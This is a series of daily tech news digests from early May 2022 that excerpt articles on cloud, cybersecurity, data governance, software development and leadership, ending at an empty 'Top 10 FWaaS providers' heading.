Daily Tech Digest - May 04, 2022

The cloud data migration challenge continues - why data governance is job one

How can governance help? The role of governance is to define the rules and policies for how individuals and groups access data properties and the kind of access they are allowed. Yet people in an organization rarely operate according to well-defined roles. They perform in multiple roles, often provisionally. On-ramping has to happen immediately; off-ramping has to be a centralized function. One very large organization we dealt with discovered that departing employees still had access to critical data for seven to nine days! So how can data governance support more intelligent data security? After all, without governance, security would be arbitrary. Many organizations that employ security schemes struggle because such schemes tend to be either too loose or too tight and almost always too rigid (insufficiently dynamic). In this way, security can hinder the progress of the organization. Yet, given the complexity of data architecture today, it’s become impossible to manage security for individuals without a coherent and dynamic governance policy to drive security allowance or grants for exceptions to those rules. 


Cybersecurity and the Pareto Principle: The future of zero-day preparedness

There’s a good reason why software asset inventory and management is the second-most important security control, according to the Centers for Internet Security’s (CIS) Critical Security Controls. It’s “essential cyber hygiene” to know what software is running and being able to access that up-to-date information instantaneously. It’s as though you were a new master-at-arms for a local baron in the Middle Ages. Your first duty would be to map out the castle grounds that you are charged to protect. ... As we put Log4Shell behind us, let’s incorporate these lessons learned for a more prepared future. The allocation of resources by enterprise security teams needs to be more purposeful, as attackers become increasingly sophisticated and continue to have what feels like unlimited resources. The value added through clear visibility and real-time insights into your entire ecosystem becomes all the more important. Remember, the core scope of the security team is to create a secure IT ecosystem, mitigate the exploit of known vulnerabilities and monitor for any suspicious activity. 


Expect to see more online data scraping, thanks to a misinterpreted court ruling

What can and should IT do about that? Given that these are generally publicly-visible pages, it’s a problem. There are few technical methods to block scrapers that wouldn’t cause problems for the site visitors the enterprise wants. Years ago, I was managing a media outlet that was making a huge move to premium content, meaning that readers would now have to pay for selected premium stories. We ran into a problem. We couldn’t allow people to freely share premium content, as we needed people to buy those subscriptions. That meant that we blocked cut-and-paste and specifically blocked someone from saving the page as a PDF. But that meant that those pages also couldn’t be printed. (Saving as PDF is really printing to PDF, so blocking PDF downloads meant blocking all printers.) It took just a couple of hours before new premium subscribers screamed that they paid for access and they need to be able to print pages and read them at home or on a train. After quite a few subscribers threatened to cancel their paid subscriptions, we surrendered and reinstated the ability to print.


Unpatched DNS Bug Puts Millions of Routers, IoT Devices at Risk

The flaw affects the ubiquitous open-source Apache Log4j framework—found in countless Java apps used across the internet. In fact, a recent report found that the flaw continues to put millions of Java apps at risk, though a patch exists for the flaw. Though it affects a different set of targets, the DNS flaw also has a broad scope not only because of the devices it potentially affects, but also because of the inherent importance of DNS to any device connecting over IP, researchers said. DNS is a hierarchical database that serves the integral purpose of translating a domain name into its related IP address. To distinguish the responses of different DNS requests aside from the usual 5-tuple–source IP, source port, destination IP, destination port, protocol–and the query, each DNS request includes a parameter called “transaction ID.” The transaction ID is a unique number per request that is generated by the client and added in each request sent. It must be included in a DNS response to be accepted by the client as the valid one for request, researchers noted. “Because of its relevance, DNS can be a valuable target for attackers,” they observed.



Managed services vs. hosted services vs. cloud services: What's the difference?

Managed service providers (MSPs) existed first - before we were talking about the big public cloud providers. “I’ve seen some definitions where MSPs are a superset and all CSPs are MSPs, but not all MSPs are CSPs. That seems a reasonable definition to me,” says Miniman. One historical example of a managed service provider you may know is Rackspace: Their company name literally reflected that you were buying space in their rack to run workloads. The way their business started out was as a hosted service: Your server ran in Rackspace’s data center. But Rackspace also offered other types of services to customers - managed services. ... “When I think of a hosted environment, that is something dedicated to me,” says Miniman. “So traditionally, there was a physical machine…that maybe had a label on it. But definitely from a security standpoint, it was “company X is renting this machine that is dedicated to that environment.” Public cloud service providers sell hundreds of services: You can think of those as standard tools, just like you’d find standard metric tools walking into any hardware store.


Making Agile Work in Asynchronous and Hybrid Environments

The ideal state for asynchronous teams is to remain aligned passively - or with little effort - eliminating the need for frequent meetings or lengthy documentation of the minutiae of every project. To pull this off, visual collaboration should be a key element of Agile management for teams that are working remotely and asynchronously. Visual collaboration brings the ease of alignment of the whiteboard into the digital workplace, giving developers a living artifact of project plans that can include diagrams, UX mockups, embedded videos, and other communication tools that can make async work nearly error-proof. Our team at Miro uses a variety of visual tools to manage our development, and many of these tools are available as free templates that other teams can use. The agile product roadmap helps prioritize work and shift tasks as priorities change. And the product launch board helps our team visually align design, development, and GtM teams as we come down to the wire on a new launch. The shared nature of these tools gives us confidence as we work.

Three steps to an effective data management and compliance strategy

Businesses clearly need to know more about their data to meet compliance needs, but the challenge is sorting through the noise in all the volume. Data analytics is essential for enterprises looking to increase efficiency, improve business decision-making and attain that important competitive edge while still ensuring that they comply with today’s data standards. However, while big data can add significant value to the decision-making process, supporting large volumes of unstructured data can be complex, as inadequate data management and data protection introduce unacceptable levels of risk. The emergence of DataOps, which is an automated and process-oriented methodology aimed at improving the quality of data analytics, further supports the requirement for enhanced data management. Driving faster and more comprehensive analytics is key to leveraging value from data, but this can only be done if data is managed correctly, the right governance protocols are in place, and data quality is kept to the highest standard.


5 key industries in need of IoT security

The growth of IoT has spurred a rush to deploy billions of devices worldwide. Companies across key industries have amassed vast fleets of connected devices, creating gaps in security. Today, IoT security is overlooked in many areas. For example, a sizable percentage of devices share the userID and password of “admin/admin” because their default settings are never changed. The reason security has become an afterthought is that most devices are invisible to organizations. Hospitals, casinos, airports, cities, etc. simply have no way of seeing every device on their networks. ... Cities rely on 1.1 billion IoT devices for physical security, operating critical infrastructure from traffic control systems, street lights, subways, emergency response systems and more. Any breach or failure in these devices could pose a threat to citizens. You see it in the movies: brilliant hackers control the traffic lights across a city, with perfect timing, to guide an armored vehicle into a trap. Then there’s real life; for instance, when a hacker in Romania took control of Washington DC’s outside video cameras days before the Trump inauguration.


Getting strategy wrong—and how to do it right instead

Making matters more complex, especially in areas of public policy and defense, real-life leaders do not have a neat economist’s single measure of value. Instead, they are faced with a bundle of conflicting ambitions—a group of desires, goals, intents, values, and fears—that cannot all be satisfied simultaneously. Forging a sense of purpose from this bundle is part of the gnarly problem. Making matters most complex is the fact that the connection between potential actions and actual outcomes is unclear. A gnarly challenge is not solved with analysis or the application of preset frameworks. A coherent response arises only through a process of diagnosing the nature of the challenges, framing, reframing, chunking down the scope of attention, referring to analogies, and developing insight. The result is a design, or creation, embodying purpose. I call it a creation because it is often not obvious at the start, the product of insight and judgment rather than an algorithm. Implicit in the concept of insightful design is that knowledge, though required, is not, by itself, sufficient.


Understand the 3 P’s of Cloud Native Security

The movement to shift security left has empowered developers to find and fix defects early so that when the application is pushed into production, it is as free as possible from known vulnerabilities at that time… But shifting security left is just the beginning. Vulnerabilities arise in software components that are already deployed and running. Organizations need a comprehensive approach that spans left and right, from development through production. While there’s no formulaic one-size-fits-all way to achieve end-to-end security, there are some worthwhile strategies that can help you get there. ... Shifting left can help organizations develop applications with security in mind. But no matter how confident you are in the security of an application when it leaves development, there is no guarantee that it will remain secure in production. We have seen on a large scale that vulnerabilities are often disclosed well after being deployed to production. Reminders include Apache Struts, Heartbleed, and, most recently, Log4j, which was first published in 2013 but discovered just last year.




Quote for the day:

"Leaders are more powerful role models when they learn than when they teach." -- Rosabeth Moss Kantor

Daily Tech Digest - May 03, 2022

5 Elements of High-Quality Software

The software architecture initially puts a foundation for a software project and lets programmers work on the particular project for many years. The entire software system’s lifetime, maintainability, and market success depend on this foundation. Late architectural changes are usually time-consuming and costly for any software development team. In other words, it’s literally impossible to change the foundation once a house is built on top of it. Therefore, we always need to strive to select the optimal architectural pattern with the first implementation attempt. It’s indeed better to spend more time on early architectural decisions rather than spending your time fixing the side-effects of instant non-optimal architectural decisions. First, work on the software system’s core functionality and stabilize — at this stage, architectural changes are not much time-consuming. Next, work on features by using the software core’s functionality. Even though you use a monolithic pattern, you can detach the core logic from features at the source-code level — not from the architectural level.


SSE kicks the ‘A’ out of SASE

Now comes security service edge (SSE), which pulls back the security functions in SASE into a unified services offering that includes CASB, zero-trust network architecture (ZTNA) and secure web gateway (SWG). SSE came in the wake of the COVID-19 pandemic, with most employees being sent home to work and putting in motion the ongoing trend toward hybrid work. With many people working from home at least part of the time, the role of branch offices is lessened and the need for security features that follow workers where they are – with work days starting from home and then moving to offices or other locations – is growing. What the role of SSE is in the larger network security space is and what it means for the future of SASE are the subjects of some debate in the industry. However, it puts a spotlight on the ongoing evolution of networking as the definition of work continues to change and the focus of IT shifts from the traditional central data center data and workloads in the cloud and at the edge. Once the pandemic hit, "it was no longer about branch offices," said John Spiegel, director of strategy at Axis Security, which in April launched Atmos, its SSE platform.


What Is Zero Trust Network Access (ZTNA)?

To begin, the idea behind the entire zero trust network access starts with the assumption that cybersecurity attacks can be a result of who is internal and who is external to the network. A traditional IT network trusts pretty much everything while a zero trust architecture network literally means “trust no one” including systems, users, software, and machines. Zero trust network access verifies a user’s identity and privileges and forces both users and devices to be continuously monitored and re-verified to maintain access. For example, let’s say that you log in to your bank account via a mobile device or even your laptop computer. Once you check your balance, you open a new tab to continue something else outside of the bank account screen. After a while, that tab will produce a pop-up with a timeout warning asking if you want to continue or log out. If you don’t reply in time, it will automatically log you out of the screen and you will be forced to log back in if you want to access your bank account details again.


Determining “nonnegotiables” in the new hybrid era of work

Skill development is another function that takes place at the group level. So, in the hybrid era, it’s also important to avoid losing those opportunities. As Degreed’s Chief Learning and Talent Officer Kelly Palmer wrote for the World Economic Forum, it’s helpful to use hybrid employees’ time at the office for “collaborative projects in which their new skills can be put to work,” while “fully remote companies can organize virtual collaborations.” Prioritizing development on both the individual and team levels is also a nonnegotiable because of the challenges presented to organizations by skill gaps. “Half of all employees around the world will need reskilling by 2025—and that number does not include all the people who are currently not in employment,” PwC Global Chairman Robert E. Moritz and World Economic Forum Managing Director Saadia Zahidi wrote in the 2021 report Upskilling for Shared Prosperity.


Things that will remain in the inkwell in the new European regulation of artificial intelligence

The European Union took a step forward and a year ago presented a proposal for a pioneering regulation in the world, which divides AI technologies into four categories based on the risk they may pose to citizens. But some experts point out that there are complex applications that, in their current wording, could be left out of regulation. Health, autonomous cars and weapons, among others. The EU debates the last fringes of the regulations on AI, which could be ready in 2023. A regulation that is “unique in the world” due to its characteristics, although it leaves important aspects in the shadows, says Lucía Ortiz de Zárate, Researcher in Ethics and Governance of Artificial Intelligence at the Autonomous University of Madrid. Ortiz de Zárate has submitted, together with the Fundación Alternativas, comments on the Commission’s proposal. ... This researcher misses the fact that there are sensitive sectors that are not included in the most closely watched artificial intelligence classifications, as is the case of health. 


How To Re-Architect Four Business Components With Digital Transformation

Going paperless and modernizing IT won't drive digital transformation on their own. On the contrary, true digital transformations encompass reevaluating current business processes and re-architecting them from the ground up to effectuate radical change. The key to successful digital transformation is to establish and seamlessly intertwine four core pillars: technology and infrastructure, business processes and models, customer experience and organizational culture. In my experience as an entrepreneur operating a digital transformation agency, high-performing organizations and digital leaders are able to continuously re-evaluate their core, identify weaknesses and opportunities and guide their teams through the ongoing transformation of all four pillars simultaneously to achieve defined goals. Whether it's an implementation of AI-driven analytics or a new customer portal, all components of the four pillars need to be considered and transformed in unison to achieve transformation goals and deliver tangible results. Initiatives that touch only the technology or infrastructure may drive improvement, but they're rarely transformative.


Deep Dive: Protecting Against Container Threats in the Cloud

Container technology, like other types of infrastructure, can be compromised in a number of different ways – however, misconfiguration reigns atop the initial-access leaderboard. According to a recent Gartner analysis, through 2025, more than 99 percent of cloud breaches will have a root cause of customer misconfigurations or mistakes. “Containers are often deployed in sets and in very dynamic environments,” Nunnikhoven explained. “The misconfiguration of access, networking and other settings can lead to an opportunity for cybercriminals.” Trevor Morgan, product manager at comforte AG, noted that companies, especially smaller companies, are generally using default configuration settings vs. more sophisticated and granular configuration capabilities: “Basic misconfigurations or accepting default settings that are far less secure than customized settings.” That can lead to big (and expensive) problems. For instance, last June the “Siloscape” malware was discovered, which is the first known malware to target Windows containers. It breaks out of Kubernetes clusters to plant backdoors, raid nodes for credentials or even hijack an entire database hosted in a cluster. ...”


DAOs: A blockchain-based replacement for traditional crowdfunding

Digital crowdfunding platforms like GoFundMe, Patreon and Kickstarter have enjoyed massive patronage over the past 10 years. This growth can be attributed primarily to the nature of crowdfunding which is set up with minimal risk. This risk is spread across all contributors of a particular idea or startup. Start-ups with financial needs will find that getting funding from traditional institutions is no easy feat. These institutions take on quite a lot of the risk involved in financing business ideas that could end badly. With a global economy still reeling from the pandemic, the accessibility and much less bureaucratic nature of DAOs as a tool for crowdfunding have been a primal factor in its growth. Digitalized crowdfunding in the form of DAOs has eliminated some traditional limits of the financing form. The simplicity makes it a disruptive force to traditional crowdfunding methods. Emmet Halm dropped out of Harvard to found DAOHQ. DAOHQ bills itself as the first marketplace for DAOs where users can find information about any DAO. 


A regular person’s guide to the mind-blowing world of hybrid quantum computing

Quantum computers allow us to harness the power of entanglement. Instead of waiting for one command to execute, as binary computers do, quantum computers can come to all of their conclusions at once. In essence, they’re able to come up with (nearly) all the possible answers at the same time. The main benefit to this is time. A simulation or optimization task that might take a supercomputer a month to process could be completed in mere seconds on a quantum computer. The most commonly cited example of this is drug discovery. In order to create new drugs, scientists have to study their chemical interactions. It’s a lot like looking for a needle in a never-ending field of haystacks. There are near-infinite possible chemical combinations in the universe, sorting out their individual combined chemical reactions is a task no supercomputer can do within a useful amount of time. Quantum computing promises to accelerate these kinds of tasks and make previously impossible computations commonplace. But it takes more than just expensive, cutting-edge hardware to produce these ultra-fast outputs.


Go Language Riding High with Devs, But Has a Few Challenges

Among the most significant technical barriers to increased Go language adoption are missing features and lack of ecosystem/library support. “We asked for more details on what features or libraries respondents were missing and found that generics was the most common critical missing feature — we expect this to be a less significant barrier after the introduction of generics in Go 1.18,” wrote Alice Merrick, a user experience researcher at Google, in a post on the Go Blog discussing the 2021 survey. “The next most common missing features had to do with Go’s type system.” The Go community added generics to the Go language in release 1.18 of the language. Release 1.18, delivered last month, provides new features to enhance security and developer productivity, and improve the performance of Go. Steve Francia, Google Cloud’s Product & Strategic Lead for Go, called the new update “monumental” and said generics was the most sought-after feature by developers. “With generics, this specific feature has been the most sought-after feature in go for the last 10 years,” Francia said.



Quote for the day:

"It takes an influential leader to excellently raise up leaders of influence." -- Anyaele Sam Chiyson

Daily Tech Digest - May 02, 2022

The Time Travel Method of Debugging Software

By removing the preconceived notions about how challenging programming is, Jason Laster became more confident in building a developer-friendly debug tool. “We want to make software more approachable,” he said. “We want more people to feel like they can program and do things that don’t require a math degree.” He went on to say, “Imagine being a Project Manager and asking your engineer why something broke and receiving a long explanation that still leaves your question unanswered. Using Replay, they can share the URL with the engineers who can just go in and leave a comment. Now, the PM can recognize the function and identify what went wrong on their own. If anybody along the way can record the issue with Replay, then everyone downstream can look at the replay, debug it and see exactly what went wrong.” Acknowledging that it’s easy to mistake Replay as another browser recorder tool, Laster explained how Replay differs. “On one end of the spectrum, you have something like a video recorder, then go along that spectrum a little bit further and you have something like a session replay tool and observability tool.


Software AI Accelerators: AI Performance Boost for Free

The increasing diversity of AI workloads has necessitated a business demand for a variety of AI-optimized hardware architectures. These can be classified into three main categories: AI-accelerated CPU, AI-accelerated GPU, and dedicated hardware AI accelerators. We see multiple examples of all three of these hardware categories in the market today, for example Intel Xeon CPUs with DL Boost, Apple CPUs with Neural Engine, Nvidia GPUs with tensor cores, Google TPUs, AWS Inferentia, Habana Gaudi and many others that are under development by a combination of traditional hardware companies, cloud service providers, and AI startups. While AI hardware has continued to take tremendous strides, the growth rate of AI model complexity far outstrips hardware advancements. About three years ago, a Natural Language AI model like ELMo had ‘just’ 94 million parameters whereas this year, the largest models reached over 1 trillion parameters. 


Cybersecurity in the digital factory for manufacturers

Many companies are extremely hesitant about introducing the Industrial Internet of Things (IIoT) or cloud systems because they believe it will open the door to cybercriminals. What they fail to realize is they’re already facing this danger every day. A simple email with an attachment or a link can result in the encryption of all the information on a server. You’re at risk even if you haven’t implemented an entire ecosystem connecting customers and suppliers. That’s why it’s essential that you’re aware of the threats and be ready to respond quickly in the event of a cyberattack. Cybersecurity is currently on everyone’s lips. In many widely publicized cases, large companies have fallen victim to cyberattacks that compromised their operations in one way or another. In some of these cases, the companies’ security policies had not kept up with the past decade’s rapid changes in the use of digital technologies and tools. They mistakenly thought a cyberattack could only affect others. The sheet metal processing sector is no exception to this reality.


Chaos Engineering and Observability with Visual Metaphors

Monitoring and observability have become one of the most essential capabilities for engineering teams and in general for modern digital enterprises who want to deliver excellence in their solutions. Since there are many reasons to monitor and observe the systems, Google has documented Four Golden Signals or metrics that define what it means for the system to be healthy and that are the foundation for the current state of the observability and monitoring platforms. The four metrics are described below: Latency is the time that a service takes to service a request. It includes HTTP 500 errors triggered due to loss of connection to a database or other critical backend that might not be served very quickly. Latency is a basic metric since a slow error is even worse than a fast error. Traffic is a measure of how much demand is being placed on the system. It determines how much stress is the system taking at a given time from users or transactions running through the service. For a web service, for example, this measurement is usually HTTP requests per second. 


Reimagining the Post Pandemic Future: Leveraging the benefits of Hyperautomation

As the world emerges from the impact of the pandemic, hyperautomation solutions will power digital self-services to take center stage connecting businesses with customers. With customers opening bank accounts remotely, consulting doctors online, interacting with governments via citizen self-serve, and so on, the scope of tech-enabled services keeps expanding from time to time. All this implies that there will be a gradual shift away from the traditional back-office towards self-serve. From a hyperautomation standpoint, this shift will see a considerable boost from low-code platforms with favorable B2C type interactions. Rich and sophisticated user experiences centered around simplicity and ease of use will be in demand. New user experiences will break ground allowing more flexibility and improved speed-to-solution. In addition to B2C type low-code portals, Artificial Intelligence (AI) and analytics will be in demand. For example, organizations will deploy AI technologies heavily to assist customer interactions. 


UK regulators seek input on algorithmic processing and auditing

On the benefits and harms of algorithms, the DRCF identified “six cross-cutting focus areas” for its work going forward: transparency of processing; fairness for those affected; access to information products, services and rights; resilience of infrastructure and systems; individual autonomy for informed decision-making; and healthy competition to promote innovation and better consumer outcomes. On algorithmic auditing, the DRCF said the stakeholders pointed to a number of issues in the current landscape: “First, they suggested that there is lack of effective governance in the auditing ecosystem, including a lack of clarity around the standards that auditors should be auditing against and around what good auditing and outcomes look like. “Second, they told us that it was difficult for some auditors, such as academics or civil society bodies, to access algorithmic systems to scrutinise them effectively. Third, they highlighted that there were insufficient avenues for those impacted by algorithmic processing to seek redress, and that it was important for regulators to ensure action is taken to remedy harms that have been surfaced by audits.”


Developer experience doesn’t have to stop at the front end

“It is natural to see providers making it easier for developers to do those things and that is where we get into infrastructure meeting software development,” RedMonk analyst James Governor told InfoWorld. “At the end of the day, you need platforms to enable you to be more productive without manually dealing with Helm charts, operators, or YAML.” Improving the back-end developer experience can do more than improve the lives of back-end developers. Providing better, more intuitive tools can enable back-end developers to get more done, while also bringing down barriers to allow a wider cohort of developers to manage their own infrastructure through thoughtful abstractions. “Developer control over infrastructure isn’t an all-or-nothing proposition,” Gartner analyst Lydia Leong wrote. “Responsibility can be divided across the application lifecycle, so that you can get benefits from “you build it, you run it” without necessarily parachuting your developers into an untamed and unknown wilderness and wishing them luck in surviving because it’s not an ‘infrastructure and operations team problem’ anymore.”


As supply chains tighten, logistics must optimize with AI

Before jumping the gun, identify your bottlenecks, understand the delivery systems available and discover the root cause of the congestion. Factors to analyze are the capacity of your shipping mediums, your warehouse management, average delivery time and the accuracy of your demand predictions. Only by understanding your current capabilities and inefficiencies will you be able to deploy the appropriate technology. Build your systems in an orderly manner: Build out your technology step by step. This is vital since some companies assume that adding multiple solutions and automating everything at once will reap the best results. This is not the case. ... Overall, applying AI analytics to problems will help you optimize elements like your optimal warehouse capacity, transportation utilization and delivery times. At some point, however, business leaders have to choose between tradeoffs. Is the main goal to keep costs low or to increase delivery speed? Are long transport distances to be avoided due to emissions? While AI can show which alternatives are more cost-effective or climate-friendly, companies will have to make the ultimate decision about their business trajectory.


SOC modernization: 8 key considerations

When an asset is under attack, security analysts need to understand if it is a test/development server or a cloud-based workload hosting a business-critical application. To get this perspective, SOC modernization combines threat, vulnerability, and business context data for analysts. ... Cisco purchased Kenna Security for risk-based vulnerability management, Mandiant grabbed Intrigue for attack surface management, and Palo Alto gobbled up Expanse Networks for ASM as well. Meanwhile, SIEM leader Splunk provides risk-based alerting to help analysts prioritize response and remediation actions. SOC modernization makes this blend a requirement. ... SOC modernization includes a commitment to constant improvement. This means understanding threat actor behavior, validating that security defenses can counteract modern attacks, and then reinforcing any defensive gaps that arise. CISOs are moving toward continuous red teaming and purple teaming for this very purpose. In this way, SOC modernization will drive demand for continuous testing and attack path management tools from vendors like AttackIQ, Cymulate, Randori, SafeBreach, and XMCyber.


Challenging misconceptions around a developer career

Experience counts a lot for developers, just as it does for pilots or surgeons. Technical experience is relatively easy to pick up, but the experiences that build instinct in the best developers are rarely gained alone. Developers work with others and learn from one another along the way. They seek collaboration on difficult problems and offer thoughtful feedback and suggestions on work in progress. Ultimately, developer tools are built for collaboration, encouraging the exchange of comments and open discussion. There are so many misconceptions about successful developers. Some of them may have some truth to them, while others are outdated or were completely false in the first place. The idea of developers as antisocial individuals is not always accurate. Developers are more often creative problem solvers who combine creativity with deep skills to tackle the task at hand. The most successful developers combine emotional intelligence with hard work and a curiosity for learning something new – and they help others around them to do the same.




Quote for the day:

"Without courage, it doesn't matter how good the leader's intentions are." -- Orrin Woodward

Daily Tech Digest - May 01, 2022

The metaverse is a transformational opportunity for the business world

The idea of the metaverse gives enterprise software developers a roadmap to build software based on a single digital identity where companies join a network to connect with other companies who have likewise joined. This is not a system that belongs to any one company, but an environment where all companies are equal. Why do businesses want to connect? Because that’s the nature of a business at its essence, connecting with customers, suppliers, and any stakeholder to establish an expectation of value from the relationship, and then measure the realization of this value over time. This thinking is not inconsistent with the idea of a VR environment where a business user engages with some part of their business in an immersive environment. But we are setting the aperture much wider to say the entire business should be thought of as being part of the metaverse, and all of the data that exists about that business can be aimed at that digital identity to create a digital twin for the entire business. Then this digital business can connect with other businesses to do what businesses do — exchange value — but is now supported by a persistent, interoperable, collaborative digital space that is co-created and co-owned by those companies who have joined the metaverse.


Cognitive Biases About Leadership and How to Survive Them

We develop cognitive biases based on our life experience. Just as we expect teachers to be good with kids and surgeons to have a steady hand, we also hold behavioral expectations for our leaders. Today’s emphasis on servant leadership has us all believing that leaders are heroes, existing to serve the people and their every action should be a selfless gesture. Then, when they fail to act in accordance with our beliefs, we become disillusioned — the hero has fallen and everything they ever did, good or bad, gets lumped into one big giant disappointment. That’s a lot of burden for a leader to bear. Instead of looking at leaders as one whole unit, we need to see them as a collection of basic human traits. We forget that within every leader is a person, with flaws and imperfections. Instead of putting the whole person on a pedestal as some kind of one-size-fits-all embodiment of goodness, just admire them for their strengths. Unpack what you like about them without discarding the whole leader. Take the good they accomplished for what it is, but don’t blame humans for not being angels.
 

Data Is The New Business Fuel, But It Requires Sound Risk Management

Today’s remote or hybrid work model poses a whole new set of security challenges. Many companies can minimize risk by leveraging a multicloud strategy, but the risk associated with malware or ransomware can compromise crucial corporate and customer data. Despite this, according to a report from Menlo Security, only 27% of organizations have advanced threat protection in place for all endpoint devices with access to company data. It’s crucial that companies deploy advanced cybersecurity software and also train employees on acceptable use of public or home-based Wi-Fi usage. While enterprise data provides the fuel that drives accurate AI, it’s important that data scientists ensure that bias doesn’t creep into the algorithms that are developed. Data should be analyzed to ensure that it is diverse and doesn’t lead to any decisions that could provide an unfair advantage to certain populations. As an example, AI that helps to determine the best suppliers to work with should be trained with diverse supplier data. Speaking of suppliers, it’s not enough that data has proper governance within the organization. 


How Aurora Serverless made the database server obsolete

Amazon Aurora Serverless v1 changed everything by enabling customers to resize their VMs without disrupting the database. It would look for gaps in transaction flows that would give it time to resize the VM. It would then freeze the database, move to a different VM behind the scenes, and then start the database again. This was a great starting point, explains Biswas, but finding transaction gaps isn't always easy. "When we have a very chatty database, we are running a bunch of concurrent transactions that overlap," he explains. "If there's no gap between them, then we can't find the point where we can scale." Consequently, the scaling process could take between five and 50 seconds to complete. It could sometimes end up disrupting the database if an appropriate transaction gap could not be found. That restricted Aurora Serverless instances to sporadic, infrequent workloads. "One piece of feedback that we heard from customers was that they wanted us to make Aurora Serverless databases suitable for their most demanding, most critical workloads," explained Biswas.


The ever-expanding cloud continues to storm the IT universe

VMware Inc. several years ago cleaned up its fuzzy cloud strategy and partnered up with everyone. And you see above, VMware Cloud on AWS doing well, as is VMware Cloud, its on-premises offering. Even though it’s somewhat lower on the X-axis relative to last quarter, it’s moving to the right with a greater presence in the data set. Dell and HPE are also interesting. Both companies are going hard after as-a-service with APEX and GreenLake, respectively. HPE, based on the survey data from ETR, seems to have a lead in spending momentum, while Dell has a larger presence in the survey as a much bigger company. HPE is climbing up on the X axis, as is Dell, although not as quickly. And the point we come back to often is that the definition of cloud is in the eye of the customer. AWS can say, “That’s not cloud.” And the on-prem crowd can say, “We have cloud too!” It really doesn’t matter. What matters is what the customer thinks and in which platforms they choose to invest. That’s why we keep circling back to the idea of supercloud. You are seeing it evolve and you’re going to hear more and more about it. 


Solving Business Problems With Blockchain

Smart contracts are one of the applications of blockchain that can vastly help companies in securing a deal. By using smart contracts, companies can form an electrical code that assists organizations to develop a venture in a conflict-free manner. Unlike traditionally, if a company tries to change the terms of the contract or denies to release a payment, everybody on the network can leverage the technology’s transparency to view the same, and the contract’s code automatically freezes the deal. The agreement would not continue further until the company pays the due or goes back to keeping up with the guidelines. This smart management of contracts helps businesses to maintain operations functioning without any friction. As blockchain is a technology that increases transparency, keeping track of the incoming and outgoing products from the site can be managed efficiently by everyone on the network. Every time a product halts at a specific gateway, the same gets documented and inserted into the blockchain ledger. This documentation increases transparency on cargo status and ensures they reach retailers on time and intact in condition.


The Future of Health Data Management: Enabling a Trusted Research Environment

TRE is becoming a commonly used acronym among the science and research community. In general, a TRE is a centralized computing database that securely holds data and allows users to gain access for analysis. TREs are only accessed by approved researchers and no data ever leaves the location. Because data stays put, the risk of patient confidentiality is reduced. ... TREs are becoming the architectural backbone for health data in many research organizations. While this is a step in the right direction, many TREs still can’t speak to colleagues from other organizations, or even other departments within their own organization. ... As the genomic sector continues to grow, the capability of TREs to communicate will allow researchers and scientists to effectively collaborate to overcome life threatening diseases and diagnosis by breaking down the “silos” of health data. That doesn’t mean moving data. Life sciences data sets are too large to move efficiently – and to complicate matters, many data security regulations forbid data to leave an organization, state or nation.


Designing Societally Beneficial Reinforcement Learning Systems

As an RL agent collects new data and the policy adapts, there is a complex interplay between current parameters, stored data, and the environment that governs evolution of the system. Changing any one of these three sources of information will change the future behavior of the agent, and moreover these three components are deeply intertwined. This uncertainty makes it difficult to back out the cause of failures or successes. In domains where many behaviors can possibly be expressed, the RL specification leaves a lot of factors constraining behavior unsaid. For a robot learning locomotion over an uneven environment, it would be useful to know what signals in the system indicate it will learn to find an easier route rather than a more complex gait. In complex situations with less well-defined reward functions, these intended or unintended behaviors will encompass a much broader range of capabilities, which may or may not have been accounted for by the designer. ... While these failure modes are closely related to control and behavioral feedback, Exo-feedback does not map as clearly to one type of error and introduces risks that do not fit into simple categories. 


Don’t Fear Artificial Intelligence; Embrace it Through Data Governance

Data-centric AI is evolving, and should include relevant data management disciplines, techniques, and skills, such as data quality, data integration, and data governance, which are foundational capabilities for scaling AI. Further, data management activities don’t end once the AI model has been developed. To support this, and to allow for malleability in the ways that data is managed, HPE has launched a new initiative called Dataspaces, a powerful cloud-agnostic digital services platform aimed at putting more control into the hands of data producers and curators as they build intelligent systems. Addressing, head on, the data gravity and compliance considerations that exist for critical datasets, Dataspaces gives data producers and consumers frictionless access to the data they need, when they need it, supporting better integration, discovery, and access, enhanced collaboration, and improved governance to boot. This means that organisations can finally leverage an ecosystem of AI-centric data management tools that combine both traditional and new capabilities to prepare the enterprise for success in the era of decision intelligence.


How DAOS Are Changing Leadership

Traditionally, top-down leadership comes to those who either already have power or the ability to purchase it. Since everyone has equal shares in a DAO, authority is not "given" to anyone. Instead, it's earned by the merits of the proposals made. This creates an organization that follows the guidance of someone people are voluntarily following. This always yields better results, whether through growth, innovation or higher profits. This style of leadership is something all good leaders can practice. Even if they didn't "earn" their role in the same way, they can earn the trust and loyalty of their team through their actions. ... Modern corporations are like enormous ships that require huge amounts of time and effort to change course. There is endless red tape and bureaucracy to navigate before any real change can be implemented. Because DAOs are more democratic, changes can be proposed and implemented with relatively little hassle. While DAOs are primarily based on the division of funds, leaders can still note how the process works and see how efficient it is. The level of efficiency DAOs create is something that great leaders can seek to replicate in their own organizations.
 


Quote for the day:

"Challenges in life always seek leaders and leaders seek challenges." -- Wayde Goodall

Daily Tech Digest - April 30, 2022

Deep Dive into CQRS — A Great Microservices Pattern

If you want to implement the CQRS pattern into an API, it is not enough to separate the routes via POST and GET. You also have to think about how you can ensure that command doesn’t return anything or at least nothing but metadata. The situation is similar to the Query API. Here, the URL path describes the desired query, but in this case, the parameters are transmitted using the query string since it is a GET request. Since the queries access the read-optimized denormalized database, the queries can be executed quickly and efficiently. However, the problem is that without regularly pulling the query routes, a client does not find out whether a command has already been processed and what the result was. Therefore, it is recommended to use a third API, the Events API, which informs about events via push notifications via web sockets, HTTP streaming, or a similar mechanism. Anyone who knows GraphQL and is reminded of the concepts of mutation, query, and subscription when describing the commands, the query, and the events API is on the right track: GraphQL is ideal for implementing CQRS-based APIs.


Why hybrid intelligence is the future of artificial intelligence at McKinsey

“One thing that hasn’t changed: our original principle of combining the brilliance of the human mind and domain expertise with innovative technology to solve the most difficult problems,” explains Alex Sukharevsky. “We call it hybrid intelligence, and it starts from day one on every project.” AI initiatives are known to be challenging; only one in ten pilots moves into production with significant results. “Adoption and scaling aren’t things you add at the tail end of a project; they’re where you need to start,” points out Alex Singla. “We bring our technical leaders together with industry and subject-matter experts so they are part of one process, co-creating solutions and iterating models. They come to the table with the day-to-day insights of running the business that you’ll never just pick up from the data alone.” Our end-to-end and transformative approach is what sets McKinsey apart. Clients are taking notice: two years ago, most of our AI work was single use cases, and now roughly half is transformational. Another differentiating factor is the assets created by QuantumBlack Labs. 


Top 10 FWaaS providers of 2022

